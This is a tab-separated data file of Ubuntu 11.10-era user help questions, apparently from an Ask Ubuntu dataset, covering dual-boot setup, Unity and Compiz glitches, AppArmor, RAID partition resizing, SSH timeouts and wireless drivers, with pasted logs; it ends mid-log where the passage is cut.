76409	issues harmonizing my dual boot	i tried to follow this guide : http : //www.howtogeek.com/howto/35807/how-to-harmonize-your-dual-boot-setup-for-windows-and-ubuntu/ i 'd wish and ca n't figure out how to make it work . i 've been dual booting ubuntu and windows 7 on my laptop for years , but i just wiped my hard drive in an attempt to follow this guide , and use one large shared storage system for the two os 's . i partitioned my 320gb hd into a 15 gig ntfs , 15 gig ext4 , 4 gig swap , and the rest as a ntfs storage partition . i installed ubuntu 11.10 from a disc and followed all the steps in the guide including configuring my subfolders . i then went straight to installing windows 7 , but my install disc was pre release and would not accept my product key . when i tried to restart and go into linux , the computer did n't even recognize the ext4 file system and went straight to the faulty windows system , i messed around with the root terminal and i think it had issues mounting the filesystem . i had to use a bootable partition tool to wipe the hard drive again and start over . i just finished doing a fresh install of linux , currently ubuntu 11.10 is all i have on my computer . i think these instructions might be outdated , but i 'm not as computer literate as i want to be and ca n't seem to figure out how to make it work i did a search , and there were plenty of topics on dual booting but i could n't find anything exactly tailored to this . hope it is n't a repost
76410	black area with stroked circle on the screen	ubuntu 11.10 just installed from scratch + few applications from ubuntu software center installed , log of installations . black area with stroked circle is appear and block ui . please look at pictures . additionally i have a problem with focus during this area are about to appear or in the middle , selected text is blinking and some keys are ignore to type . i had such problem on ubuntu 10.04 + all updates ( but without this area ) , that forced me to install new ubuntu . the same effect i see under unity2d , and gnome shell . windows vista in dual boot works fine . i just want to open issue against ubuntu , but do not understand what component is it , is there workaround ? any advice is appreciated .
76412	why do i have to enable the apparmor profile for firefox ? why is n't it `` on '' by default ?	i have a pretty standard default install of 11.10 ( unity 3d ) . i 'm trying to understand a bit about apparmor . sudo aa-status shows me that the available firefox profile is n't being enforced ( since it is n't listed ) . am i right in using sudo aa-enforce /etc/apparmor.d/usr.bin.firefox and then rebooting to start the enforcement ( immunization ) ? is it correct that the firefox profile is n't active by default since the current version number ( now 7.0.1 ) is part of the profile ? /usr/lib/firefox-7.0.1/ appears several times . in other words , users will have to be aware of this and bump the version number ( correctly ) each time it changes ? is that the only reason the profile is n't enforced by default ? or is there something else i need to do before enforcing the default firefox profile ? will just editing /etc/apparmor.d/usr.bin.firefox with each change in version number be sufficient ?
76413	how do i inncrease unity dash icon sizes or set 720p but view movies in 1080p ?	i would like to use 11.10 on my tv as a mediacenter and more . the problem is that when i sit on my couch the icons in unity dash ( expanded , viewing all installed apps ) are too small . now i am wondering if one can increase their size , or if it is possible to just set the screen resoluton to 720p but ( how ? ) view full hd movies in 1080p switching to 1080p in a easy way ? any ideas ?
76414	no pidgin main window on first open	i removed emapathy and installed pidgin . why ? because i hate empathy . the problem is that when i start pidgin for first time after login into ubuntu . via dash or me menu , i can not see the main window . an icon pops up both in launcher and even in the alt+tab window switcher thing . but no main window preview even on pressing alt + ` or clicking on the launcher.. i have to right click on it launcher in dash , quit it and den again open pidgin to see the main chat window . i do n't know whats the issue here but its very irritating .
76416	how do i recover my desktop settings after accidentally changing my home directory ?	i 'm new to ubuntu.i 'm using ubuntu 11.10 . today i execute usermod -d /etc/skel username ; chown -r username /etc/skel command by login root user . after a reboot it had changed my home folter path to /etc/skel . also i had lost my desktop settings too . can any one let me know how to recover this .
76420	application to integrate gmail in unity	i want to write an application that will integrate gmail into unity please help me . ps i dont want to use previous applications like gmail notifiers .
76421	window-manager ( close , minimize , maximize ) buttons does not appear when window is maximized	my pc is fairly old and the hardware is quite weak , but it runs unity 2d quite well and fast . but i have this only one problem . the close/minimize , maximize buttons dont appear when i open a application window ( like writer , calc , etc ) and the launcher ( sidebar ) disappears before the application opens . i notices however when the application opens with the launcher bar on the screen there is no problem . also when i the buttons dont appear with i click the dash home and return to the window the buttons appear . is this a bug ? is there a fix to this ?
76423	how to change the color of fileâs size under the file 's name in nautilus 3.2.1 ?	i want the color of file 's size is different from that the name . how can i change it ?
76425	gedit 3 regex search replace plugin port	so i have been trying to install this plugin : http : //halfhourhacks.blogspot.com/2008/03/gedit-regular-expression-plugin.html in gedit 3.2.1 but there seem to be some issues . i have modified the .plugin file and now it shows up in the list of plugins . but when i try to select the plugin from the list , gedit closes . so i noticed that the plugin import modules from gtk+2 so i tried changing them to the gtk+3 equivalents . also a lot of the built in plugins code look slightly different than this plugin . after making changes to init.py , when i click on the plugin from the list of plugins that is in the list , a error icon shows up next to the plugin name and it gets greyed out . has anyone been able to port this plugin ?
76428	i aborted the ubuntu upgrade , i ca n't get on ubuntu anymore now	yesterday i was updating my ubuntu 11.04 to 11.10 but it was already quite late and when i noticed that it would take 2 hours to finish the installation i thought i 'd just install it tomorrow instead , so i shut off my computer . ubuntu is dualbooted with vista , and when i selected 'ubuntu ' this morning , it loads and shows me the purple screen but right after that black text begins to load checking several items such as 'battery status ' , ... but it never gets passed that screen . is there anything i can do to fix this ...
76435	how can i use hal in recent versions of ubuntu ?	i 've found that hal seems to be the only way to generate events when a cd/dvd/blu-ray is inserted ( if you know of a better way , please reply to this question ) , so i 'm trying to get hal running on my headless 10.04 server . it seems to work okay when i run it manually with sudo hald -- daemon=yes -- use-syslog . the problem is that hald does not automatically run on startup ( i assume because it 's deprecated ) , and there 's no sign of it in /etc/init.d . what 's the proper way to get hal running at startup in lucid and beyond ? and do i have to worry about other things getting screwed up by having this deprecated software around ?
76438	need to restore default 11.10 graphics . how do i do it ?	i switched off the `` animations '' options in the ccsm manager by mistake . this removed all the window decorations , removed unity , and even the top menu bar which has the shutdown menu i restarted , but it did n't make any difference . the login screen is fine . all i see after login is the wallpaper . how do i `` undo '' this mistake ? i can use keyboard shortcuts , and hence , access the terminal . also , when i tried to restart unity from terminal , this is what i see , after which it does n't show anything else : shashwat @ shashwat302 : ~ $ unity unity-panel-service : no process found checking if settings need to be migrated ... no checking if internal files need to be migrated ... no backend : gconf integration : true profile : unity adding plugins skipping upgrade com.canonical.unity.unity.01.upgrade skipping upgrade com.canonical.unity.unity.02.upgrade initializing core options ... done initializing bailer options ... done initializing detection options ... done initializing composite options ... done initializing opengl options ... done initializing decor options ... done initializing mousepoll options ... done initializing vpswitch options ... done initializing animation options ... done initializing snap options ... done compiz ( expo ) - warn : failed to bind image to texture initializing expo options ... done initializing move options ... done initializing place options ... done initializing grid options ... done initializing gnomecompat options ... done initializing wall options ... done initializing ezoom options ... done initializing workarounds options ... done initializing staticswitcher options ... done initializing resize options ... done initializing fade options ... done initializing scale options ... done initializing session options ... done setting update `` main_menu_key '' setting update `` run_key '' compiz ( core ) - warn : failed to receive configurenotify event on 0x3200044 compiz ( core ) - warn : failed to receive configurenotify event on 0x28002d4 compiz ( core ) - warn : failed to receive configurenotify event on 0x28002e2 what should i do ?
76444	ubuntu sofware center problem	i am using ubuntu 11.10 . i have a problem with the software center . i am not able to install anything from it . after i entered my authorisation password it gives the following error : failed to download package files check your internet connection . after that it says requires installation of untrusted packages . the action would require the installation of packages from not authenticated sources .
76445	resizing partitions on a raid 0 array by command line	oh boy this is a qustion and a half . simply put when i set up the server it was n't intended to be used for what it is now , and root ( / ) has run out of diskspace , while /home has tonnes of the stuff floating around . filesystem 1k-blocks used available use % mounted on rootfs 10157944 9600344 45656 100 % / /dev/root 10157944 9600344 45656 100 % / /dev 8183468 8 8183460 1 % /dev none 1636756 252 1636504 1 % /run none 5120 0 5120 0 % /run/lock none 8183772 0 8183772 0 % /run/shm /dev/md3 211225328 17996836 182583336 9 % /home lesson learned ! ( give / more room next time ... ) here 's the output from parted showing the disks and their current sizes , and the raid array . model : ata intel ssdsa2cw12 ( scsi ) disk /dev/sda : 120gb sector size ( logical/physical ) : 512b/512b partition table : msdos number start end size type file system flags 1 2097kb 10.5gb 10.5gb primary ext4 boot , raid 2 10.5gb 11.0gb 535mb primary linux-swap ( v1 ) 3 11.0gb 120gb 109gb primary raid model : ata intel ssdsa2cw12 ( scsi ) disk /dev/sdb : 120gb sector size ( logical/physical ) : 512b/512b partition table : msdos number start end size type file system flags 1 2097kb 10.5gb 10.5gb primary ext4 raid 2 10.5gb 11.0gb 535mb primary linux-swap ( v1 ) 3 11.0gb 120gb 109gb primary raid model : linux software raid array ( md ) disk /dev/md3 : 218gb sector size ( logical/physical ) : 512b/512b partition table : loop number start end size file system flags 1 0.00b 218gb 218gb ext4 model : linux software raid array ( md ) disk /dev/md1 : 10.5gb sector size ( logical/physical ) : 512b/512b partition table : loop number start end size file system flags 1 0.00b 10.5gb 10.5gb ext4 what i need to do is shrink the /home partition by 40gb and increase the / partition by 40gb . parted told me when i used the resize command that : '' warning : you are attempting to use parted to operate on ( resize ) a file system . parted 's file system manipulation code is not as robust as what you 'll find in dedicated , file-system-specific packages like e2fsprogs . we recommend you use parted only to manipulate partition tables , whenever possible . support for performing most operations on most types of file systems will be removed in an upcoming release . '' and looking up e2fsprogs tells me they are ext2 tools , which scares the hell out of me considering the disks are ext4 . is there a safe way to resize the partitions ? i 'm working on this 600miles away from the server by ssh with no direct access . thanks in advance ! andrew `` laice '' faulkner
76446	how can i configure gnome shell notification settings ?	i could n't find where i can change gnome shell notification settings . i clicked the button that appears with `` do n't show again '' ( or something like that ) label on a notification , and now when that notification appears , it never disappears until i click on that . where is the configuration window of gnome shell notifications ?
76488	system wo n't boot unless i type `` exit '' at initramfs prompt	i installed mdadm for my raid , and ever since that when i boot up the system just sits at the purple screen forever . after pulling my hair out for a week , i finally discovered - purely by accident - that it 's sitting at an initramfs prompt in the background and i have to blindly type `` exit '' and then ubuntu resumes normal boot . how do i fix this ? i am unable to reboot my machine if i 'm not sitting in front of it because it will never boot !
76506	can not establish ssh connection to computer on local network	i 've just ( re ) installed ubuntu 11.10 on my main pc , and the connection times out every time i try to ssh connect to my laptop ( over the local network ) to retrieve the files i backed up there . the connection times out every time i try to connect . i can establish a connection in the other direction without issue . here 's the verbose output i get when i try to connect : ovangle @ ruby-ep43-ds3 : ~ $ ssh -v ovangle @ 10.1.1.4 openssh_5.8p1 debian-7ubuntu1 , openssl 1.0.0e 6 sep 2011 debug1 : reading configuration data /etc/ssh/ssh_config debug1 : applying options for * debug2 : ssh_connect : needpriv 0 debug1 : connecting to 10.1.1.4 [ 10.1.1.4 ] port 22. debug1 : connect to address 10.1.1.4 port 22 : connection timed out ssh : connect to host 10.1.1.4 port 22 : connection timed out ssh is installed on both machines , and i 've tried deleting '~/.ssh/known_hosts ' on both machines , still nada . i 've changed the sshd logging on the laptop to verbose and restarted the daemon ( because i was n't getting any relevant syslog entries otherwise ) , and this is the log for the most recent connection attempt . edit : posted wrong logs last time . they just showed that there was a connection received , they were n't actually the sshd logs ( which were in auth.log as i recently discovered ) . unfortunately , that log is filling up with extremely weird error messages and it gives me no information about the connection . nov 8 16:02:18 ovangle-a6rp pkexec : pam_unix ( polkit-1 : session ) : session opened for user root by ( uid=1000 ) nov 8 16:02:18 ovangle-a6rp pkexec : pam_ck_connector ( polkit-1 : session ) : can not determine display-device nov 8 16:02:18 ovangle-a6rp pkexec [ 6270 ] : ovangle : executing command [ user=root ] [ tty=unknown ] [ cwd=/home/ovangle ] [ command=/usr/sbin/gnome-power-backlight-helper -- set-brightness 2 ] nov 8 16:02:19 ovangle-a6rp pkexec : pam_unix ( polkit-1 : session ) : session opened for user root by ( uid=1000 ) nov 8 16:02:19 ovangle-a6rp pkexec : pam_ck_connector ( polkit-1 : session ) : can not determine display-device nov 8 16:02:19 ovangle-a6rp pkexec [ 6273 ] : ovangle : executing command [ user=root ] [ tty=unknown ] [ cwd=/home/ovangle ] [ command=/usr/sbin/gnome-power-backlight-helper -- set-brightness 7 ]
76514	how do i make nautilus to automatically suggest the folder 'documents ' for pdf files ?	in ubuntu 11.10 , how can i set up nautilus so that when i select `` save as ... '' on evince or some other pdf viewer , for a pdf i downloaded with the browser , it automatically suggests the folder 'documents ' for saving that pdf file ? right now it just gives me the last folder that was used to save something before . i remember 11.04 was doing exactly this , which is convenient to keep all pdfs in a single folder .
76520	usc gives `` failed to download package files '' message - how to fix ?	trying to download a program ( advanced settings aka gnome tweak tool ) from usc and getting this error `` failed to download package files : check your internet connection '' . under details is info : failed to fetch http : //ch.archive.ubuntu.com/ubuntu/pool/main/n/network-manager/gir1.2-networkmanager-1.0_0.9.1.90-0ubuntu4_i386.deb 404 not found question : how to fix ? note : i tried downloading another program from usc ( gnucash ) and it worked fine . and my internet connect is working fine ( able to surf the web , etc ) and ubuntu is fully up to date and is able to download updates . it seems to be a problem just getting the `` advanced settings '' program . ( ubuntu 11.10 ) .
76543	how do i disable gdm and graphical user selection ?	the new ubuntu features a completely unkillable gdm . is there a way to disable it ? it is not enabled in services , the gdm startup script is deleted , it is removed from 'update.rc ' but it still starts up . how do i disable gdm and graphical user selection ?
76560	top panel ubuntu 11.10	i just install ubuntu 11.10 on my pc and i do n't like new desktop ( unity ) . i follow steps to change looks my desktop and i install package to get the gnome classic . so , now i ca n't edit my top panel ... .i need help , i just resolve my problems with nautilus and places menu
76576	remapping alt + f2 in unity	i disabled the alt + f2 default shortcut in unity ( ubuntu 11.10 ) using ccsm and i set a new shortcut using the default system shortcut manager ( system settings > keyboard ) . and it works , until i execute a command like compiz -- replace . after that , all shortcuts keep working normally , except for alt + f2 . it does nothing . any suggetions to keep the custom alt + f2 shortcut working after compiz -- replace ?
76581	why does the synaptic package manager exit when it starts ?	my problem is that whenever i start synaptic package manager from either the terminal or the desktop it starts up and then instantly crashes back to the desktop . i have uninstalled and re-installed but there is no change . i do n't know how to fix the broken packages since it is gone from the recovery mode . if it helps i am running a dell dimension 2350 2.4 ghz cpu , ati radion x1300 graphics card , 2 gb of ram , and a 13.9 gb hard drive with ubuntu 11.10
76591	how do i upgrade from media/iso ?	i have downloaded & burnt iso of ubuntu v11.10 & was trying to upgrade my current installation ( running v11.04 ) when i ran into a strange issue . the installer ( when i boot from media ) does not detect my existing ubuntu setup . it detects my windows 7 installation & gives me 3 choices but no upgrade choice . when i try upgrading in ( while running ) ubuntu - it tries to download the upgrades again . is n't there a method where i can upgrade my existing installation just using the media ?
76594	panic occurred switching to text console in netbook	yes , i know that there is exactly the same question is asked here , but in my case i would like to provide more information in order to try to solve the problem . because that question had been asked more than a week ago and still does n't have an answer . so , i am using a netbook asus eee pc 1001 ha , 10 '' with ubuntu 11.10 desktop . the screenshot is given below . this error message has been started to occur occasionally 2 days ago . after showing this error message ubuntu just stops to respond to any command and i need to shut down the netbook using power button . so , what could be the problem here ? do you think it is a hardware problem or a software problem ? if you need any further information i can provide it without any problem . thank you .
76608	why does transmission bittorrent client say `` could not connect to tracker '' ?	i recently can not download anything via transmission and the download process remains idle ( `` downloading from 0 of 0 connected peers '' ) . going through properties > trackers , i see `` could not connect to tracker '' or `` tracker gave http respond 404 '' messages in red . i also use a vpn connection and i did n't have this problem on 11.04 . is there a way to get rid of this issue ?
76613	rename usb stick appends na to name	i try to rename a usb stick ( i.e . give it a new label ) . both using gparted and mlabel i get following behaviour : the rename works , but the string `` na '' is appended to the name ( it is less than 11 characters ) . this is very annoying , because the appended string is right-justified , and spaces are inserted in the middle between my name and the `` na '' , resulting in a new label like `` new-name na '' . anyone have an idea how to get rid of the `` na '' ? update : this behaviour only takes place with new names that are at least 8 characters long .
76618	how to interact with ubuntu through voice command ( mic ) ?	i want to know how to deal with ubuntu using voice command ( e.g . open home to open my home folder & minimize & maximize ) , is there any program can do it ? ? ? it mean i can speak to the computer and it speak to me
76623	unable to create/connect to wireless on a dell n4050 with a bcm4313	i am new to ubuntu.i have already updated after fresh installation of 11.10 . it can detect wireless , but can not establish connections.i am using dell inspiron n4050 . bcm4313 802.11b/g/n wireless lan controller
76627	keepassx 0.4.3 on 11.10 ( unity ) not visible in task switcher ( alt-tab )	update : problem solved . i 've rebooted , and now it just works . i can not reproduce the problem anymore myself . ( reported as https : //bugs.launchpad.net/ubuntu/+source/keepassx/+bug/887115 ) i run keepassx , then switch to another application . now neither is the keepassx window accessible by using alt-tab / task switcher , nor in the left-hand launcher icons . i have to manually move the other application windows out of the way to get back to the keepassx window . i do n't dare minimize it ... i have the keepassx icon added to the launcher , but it has no indicator for the open application window , and when i click it again , it just opens another keepassx instance . i would expect the keepassx window ( s ) to be visible in the launcher and task switcher just like any other application windows . any idea what could be the problem ? workarounds : right-click on the keepassx window title bar , and choose `` always on top '' . keeps the window in the foreground and i do n't loose it . or : alt-shift-up also exposes the keepassx window . ( found the latter on task switcher not showing terminal windows )
76630	bluetooth not working correctly - can not browse cel . phone	another issue i found in ubuntu 11.10 - bluetooth works improperly : i can not browse the files on my cellular phone . in /var/syslog i see : laptop obex-data-server : sdp_extract_seqtype : unexpected end of packet however , i can send files to the phone and from the phone .
76631	can not login to the ubuntuone webpage	i can not login to the one.ubuntu.com page from my ubuntu pc ( 11.10 + firefox ) . when entering the email address and password it replies with a `` stale request '' page . from other pcs with windows + firefox it works fine .
76638	volume up/down reset after unplugging headphones	if i use fn+volumeup/down key combination to turn down the volume in my laptop , and then unplug the headphones from it , the volume goes back to what it was before . has anyone noticed this bug ? how can it be solved ?
76643	is there an easy way to have vsftpd server show up again in webmin 1.530 ?	vsftpd is running fine on ubuntu lamp server 10.04 , but for some reason is no longer available from webmin anymore . re-installing vsftpd makes no difference . users are still able to log in via ftp .
76652	how can i get my wacom tablet to use the mouse in relative ( touchpad ) mode ?	i am currently using ubuntu 11.10 with a first edition wacom bamboo fun 4x6 tablet . the wacom tablet driver in ubuntu acknowledges the wacom pen and its buttons just fine . however , it does n't switch to relative mode when i use the wacom mouse . also , switching to relative mode manually using the applet in system settings will not work with the mouse . it stays in absolute or tablet mode .
76663	files for customising live cd	i 'm using uck to customize life cd . which files should i edit to change the default font , wallpaper logon background , window/gtk/icon theme also change the default apps for music and video files..
76685	sometimes sound does not work	sometimes when i boot ubuntu sound does not work . please help me diagnose it . lspci -nn | grep audio 00:1b.0 audio device [ 0403 ] : intel corporation 5 series/3400 series chipset high definition audio [ 8086:3b56 ] ( rev 06 ) 01:00.1 audio device [ 0403 ] : nvidia corporation device [ 10de:0be3 ] ( rev a1 ) if you need any addition info please let me know .
76688	how do i add screen resolutions ?	my monitor supports up to 1440x990 , but the only available screen resolutions are 1024x768 and 800x600 . how can i add support for resolutions such as 1280x720 and 1440x990 ? thanks.hardware is as follows : 00:02.0 vga compatible controller : intel corporation mobile 945gm/gms , 943/940gml express integrated graphics controller ( rev 03 ) 00:02.1 display controller : intel corporation mobile 945gm/gms/gme , 943/940gml express integrated graphics controller ( rev 03 ) monitor is an optiquest q191wb . i haven't done much since the fresh install other than change install/remove some apps . if you can be more specific as to what you are looking for , concerning what i 've done since the fresh install , i can let you know . i have documented everything i 've done . thanks again .
76708	reply using default account regardless of source account ?	i have multiple accounts in evolution 3.2 , but only want to reply from one of them , regardless of which account the email came into - does anyone know if this is possible ? for example , email comes in under account 3 , but i want to reply using account 1 by default ( i know you can manually select the account at the top of the email message ) .
76712	setting nautilus-open-terminal to launch terminator rather than gnome-terminal	the nautilus-open-terminal package adds a menu/right-click option to open a terminal in the current directory . i want to change this from opening gnome-terminal to opening terminator . there is some advice on changing the default terminal emulator here , however these instructions do not appear to be valid any more , and i ca n't find any place in the system settings where the default emulator can be changed . i also tried : $ sudo update-alternatives -- config x-terminal-emulator choosing * 0 /usr/bin/terminator 50 auto mode but this does not appear to have any effect . any idea how i can get this to work ?
76721	wireless does n't work with a bcm4311	i just installed ubuntu 11.10 alongside windows and i do n't have wireless network access . in the additional drivers program it says that the broadcom sta wireless driver is active and in use . using the ubuntu help for wireless troubleshooting , one of the first steps is to make sure that in the network menu the wireless is enabled . there is not an option for me to turn on the wireless . i have no problems connecting with a wired connection . 03:00.0 ethernet controller [ 0200 ] : broadcom corporation bcm4401-b0 100base-tx [ 14e4:170c ] ( rev 02 ) 0c:00.0 network controller [ 0280 ] : broadcom corporation bcm4311 802.11b/g wlan [ 14e4:4311 ] ( rev 01 ) $ sudo tail -100 /var/log/jockey.log 2011-11-08 10:10:56,707 debug : searching handler for driver id { 'driver_type ' : 'kernel_module ' , 'kernel_module ' : 'psmouse ' } 2011-11-08 10:10:56,708 debug : no corresponding handler available for { 'driver_type ' : 'kernel_module ' , 'kernel_module ' : 'psmouse ' , 'jockey_handler ' : 'kernelmodulehandler ' } 2011-11-08 10:10:56,708 debug : querying driver db < jockey.detection.localkernelmodulesdriverdb instance at 0xb763364c > about hardwareid ( 'modalias ' , 'ssb : v4243id0812rev0a ' ) 2011-11-08 10:10:56,708 debug : searching handler for driver id { 'driver_type ' : 'kernel_module ' , 'kernel_module ' : 'b43 ' } 2011-11-08 10:10:56,708 debug : no corresponding handler available for { 'driver_type ' : 'kernel_module ' , 'kernel_module ' : 'b43 ' , 'jockey_handler ' : 'kernelmodulehandler ' } 2011-11-08 10:10:56,708 debug : querying driver db < jockey.detection.localkernelmodulesdriverdb instance at 0xb763364c > about hardwareid ( 'modalias ' , 'pci : v00008086d00002832sv00001028sd00000228bc0csc03i00 ' ) 2011-11-08 10:10:56,712 debug : querying driver db < jockey.detection.localkernelmodulesdriverdb instance at 0xb763364c > about hardwareid ( 'modalias ' , 'input : b0019v0000p0000e0000-e0,1,4 , k94,95 , a1 , e0 , e1 , e3 , ec , ee , f0 , ram4 , lsfw ' ) 2011-11-08 10:10:56,712 debug : searching handler for driver id { 'driver_type ' : 'kernel_module ' , 'kernel_module ' : 'evbug ' } 2011-11-08 10:10:56,712 debug : no corresponding handler available for { 'driver_type ' : 'kernel_module ' , 'kernel_module ' : 'evbug ' , 'jockey_handler ' : 'kernelmodulehandler ' } 2011-11-08 10:10:56,712 debug : querying driver db < jockey.detection.localkernelmodulesdriverdb instance at 0xb763364c > about hardwareid ( 'modalias ' , 'input : b0003v093ap2510e0110-e0,1,2,4 , k110,111,112 , r0,1,8 , am4 , lsfw ' ) 2011-11-08 10:10:56,712 debug : searching handler for driver id { 'driver_type ' : 'kernel_module ' , 'kernel_module ' : 'evbug ' } 2011-11-08 10:10:56,712 debug : no corresponding handler available for { 'driver_type ' : 'kernel_module ' , 'kernel_module ' : 'evbug ' , 'jockey_handler ' : 'kernelmodulehandler ' } 2011-11-08 10:10:56,713 debug : querying driver db < jockey.detection.localkernelmodulesdriverdb instance at 0xb763364c > about hardwareid ( 'modalias ' , 'acpi : pnp0b00 : ' ) 2011-11-08 10:10:56,713 debug : querying driver db < jockey.detection.openprintingdriverdb instance at 0xb74386ec > about hardwareid ( 'modalias ' , 'pci : v00008086d00002834sv00001028sd00000228bc0csc03i00 ' ) 2011-11-08 10:10:56,713 debug : querying driver db < jockey.detection.openprintingdriverdb instance at 0xb74386ec > about hardwareid ( 'modalias ' , 'input : b0019v0000p0003e0000-e0,1 , k8e , ramlsfw ' ) 2011-11-08 10:10:56,713 debug : querying driver db < jockey.detection.openprintingdriverdb instance at 0xb74386ec > about hardwareid ( 'modalias ' , 'pci : v00001180d00000822sv00001028sd00000228bc08sc05i01 ' ) 2011-11-08 10:10:56,713 debug : querying driver db < jockey.detection.openprintingdriverdb instance at 0xb74386ec > about hardwareid ( 'modalias ' , 'pci : v00001180d00000832sv00001028sd00000228bc0csc00i10 ' ) 2011-11-08 10:10:56,713 debug : querying driver db < jockey.detection.openprintingdriverdb instance at 0xb74386ec > about hardwareid ( 'modalias ' , 'acpi : pnp0800 : ' ) 2011-11-08 10:10:56,713 debug : querying driver db < jockey.detection.openprintingdriverdb instance at 0xb74386ec > about hardwareid ( 'modalias ' , 'acpi : pnp0303 : ' ) 2011-11-08 10:10:56,713 debug : querying driver db < jockey.detection.openprintingdriverdb instance at 0xb74386ec > about hardwareid ( 'modalias ' , 'pci : v00008086d00002835sv00001028sd00000228bc0csc03i00 ' ) 2011-11-08 10:10:56,713 debug : querying driver db < jockey.detection.openprintingdriverdb instance at 0xb74386ec > about hardwareid ( 'modalias ' , 'platform : reg-dummy ' ) 2011-11-08 10:10:56,714 debug : querying driver db < jockey.detection.openprintingdriverdb instance at 0xb74386ec > about hardwareid ( 'modalias ' , 'input : b0000v0000p0000e0000-e0,5 , kramlsfw4 , ' ) 2011-11-08 10:10:56,714 debug : querying driver db < jockey.detection.openprintingdriverdb instance at 0xb74386ec > about hardwareid ( 'modalias ' , 'platform : pcspkr ' ) 2011-11-08 10:10:56,714 debug : querying driver db < jockey.detection.openprintingdriverdb instance at 0xb74386ec > about hardwareid ( 'modalias ' , 'usb : v1d6bp0001d0300dc09dsc00dp00ic09isc00ip00 ' ) 2011-11-08 10:10:56,714 debug : querying driver db < jockey.detection.openprintingdriverdb instance at 0xb74386ec > about hardwareid ( 'modalias ' , 'pci : v00001180d00000592sv00001028sd00000228bc08sc80i00 ' ) 2011-11-08 10:10:56,714 debug : querying driver db < jockey.detection.openprintingdriverdb instance at 0xb74386ec > about hardwareid ( 'modalias ' , 'input : b0011v0001p0001eab41-e0,1,4,11,14 , k71,72,73,74,75,76,77,79,7a,7b,7c,7d,7e,7f,80,8c,8d,8e,8f,94,98,9b,9c,9d,9e,9f , a2 , a3 , a4 , a5 , a6 , ac , ad , b7 , b8 , b9 , bf , c1 , cd , d4 , d7 , d9 , e0 , e1 , e2 , e3 , ec , f0 , ram4 , l0,1,2 , sfw ' ) 2011-11-08 10:10:56,714 debug : querying driver db < jockey.detection.openprintingdriverdb instance at 0xb74386ec > about hardwareid ( 'modalias ' , 'acpi : pnp0100 : ' ) 2011-11-08 10:10:56,714 debug : querying driver db < jockey.detection.openprintingdriverdb instance at 0xb74386ec > about hardwareid ( 'modalias ' , 'pci : v00001180d00000852sv00001028sd00000228bc08sc80i00 ' ) 2011-11-08 10:10:56,714 debug : querying driver db < jockey.detection.openprintingdriverdb instance at 0xb74386ec > about hardwareid ( 'modalias ' , 'platform : dell-laptop ' ) 2011-11-08 10:10:56,714 debug : querying driver db < jockey.detection.openprintingdriverdb instance at 0xb74386ec > about hardwareid ( 'modalias ' , 'pci : v00008086d00002831sv00001028sd00000228bc0csc03i00 ' ) 2011-11-08 10:10:56,714 debug : querying driver db < jockey.detection.openprintingdriverdb instance at 0xb74386ec > about hardwareid ( 'modalias ' , 'platform : dcdbas ' ) 2011-11-08 10:10:56,715 debug : querying driver db < jockey.detection.openprintingdriverdb instance at 0xb74386ec > about hardwareid ( 'modalias ' , 'wmi:05901221-d566-11d1-b2f0-00a0c9062910 ' ) 2011-11-08 10:10:56,715 debug : querying driver db < jockey.detection.openprintingdriverdb instance at 0xb74386ec > about hardwareid ( 'modalias ' , 'pci : v00008086d00002a00sv00001028sd00000228bc06sc00i00 ' ) 2011-11-08 10:10:56,715 debug : querying driver db < jockey.detection.openprintingdriverdb instance at 0xb74386ec > about hardwareid ( 'modalias ' , 'wmi:9dbb5994-a997-11da-b012-b622a1ef5492 ' ) 2011-11-08 10:10:56,715 debug : querying driver db < jockey.detection.openprintingdriverdb instance at 0xb74386ec > about hardwareid ( 'modalias ' , 'ssb : v4243id0807rev03 ' ) 2011-11-08 10:10:56,715 debug : querying driver db < jockey.detection.openprintingdriverdb instance at 0xb74386ec > about hardwareid ( 'modalias ' , 'acpi : pnp0c32 : ' ) 2011-11-08 10:10:56,715 debug : querying driver db < jockey.detection.openprintingdriverdb instance at 0xb74386ec > about hardwareid ( 'modalias ' , 'acpi : pnp0f13 : ' ) 2011-11-08 10:10:56,715 debug : querying driver db < jockey.detection.openprintingdriverdb instance at 0xb74386ec > about hardwareid ( 'modalias ' , 'pci : v000010ded00000427sv00001028sd00000228bc03sc00i00 ' ) 2011-11-08 10:10:56,715 debug : querying driver db < jockey.detection.openprintingdriverdb instance at 0xb74386ec > about hardwareid ( 'modalias ' , 'acpi : lnxsystm : ' ) 2011-11-08 10:10:56,715 debug : querying driver db < jockey.detection.openprintingdriverdb instance at 0xb74386ec > about hardwareid ( 'modalias ' , 'pci : v00008086d0000283asv00001028sd00000228bc0csc03i20 ' ) 2011-11-08 10:10:56,715 debug : querying driver db < jockey.detection.openprintingdriverdb instance at 0xb74386ec > about hardwareid ( 'modalias ' , 'acpi : pnp0c01 : ' ) 2011-11-08 10:10:56,716 debug : querying driver db < jockey.detection.openprintingdriverdb instance at 0xb74386ec > about hardwareid ( 'modalias ' , 'acpi : pnp0c04 : ' ) 2011-11-08 10:10:56,716 debug : querying driver db < jockey.detection.openprintingdriverdb instance at 0xb74386ec > about hardwareid ( 'modalias ' , 'usb : v0951p1603d0200dc00dsc00dp00ic08isc06ip50 ' ) 2011-11-08 10:10:56,716 debug : querying driver db < jockey.detection.openprintingdriverdb instance at 0xb74386ec > about hardwareid ( 'modalias ' , 'pci : v00008086d00002850sv00001028sd00000228bc01sc01i8a ' ) 2011-11-08 10:10:56,716 debug : querying driver db < jockey.detection.openprintingdriverdb instance at 0xb74386ec > about hardwareid ( 'modalias ' , 'pci : v000014e4d00004311sv00001028sd00000007bc02sc80i00 ' ) 2011-11-08 10:10:56,716 debug : querying driver db < jockey.detection.openprintingdriverdb instance at 0xb74386ec > about hardwareid ( 'modalias ' , 'serio : ty05pr00id00ex00 ' ) 2011-11-08 10:10:56,716 debug : querying driver db < jockey.detection.openprintingdriverdb instance at 0xb74386ec > about hardwareid ( 'modalias ' , 'pci : v000014e4d0000170csv00001028sd00000228bc02sc00i00 ' ) 2011-11-08 10:10:56,716 debug : querying driver db < jockey.detection.openprintingdriverdb instance at 0xb74386ec > about hardwareid ( 'modalias ' , 'input : b0019v0000p0005e0000-e0,5 , kramlsfw0 , ' ) 2011-11-08 10:10:56,716 debug : querying driver db < jockey.detection.openprintingdriverdb instance at 0xb74386ec > about hardwareid ( 'modalias ' , 'input : b0000v0000p0000e0000-e0,5 , kramlsfw2 , ' ) 2011-11-08 10:10:56,716 debug : querying driver db < jockey.detection.openprintingdriverdb instance at 0xb74386ec > about hardwareid ( 'modalias ' , 'usb : v05a9p2640d0100dcefdsc02dp01ic0eisc02ip00 ' ) 2011-11-08 10:10:56,717 debug : querying driver db < 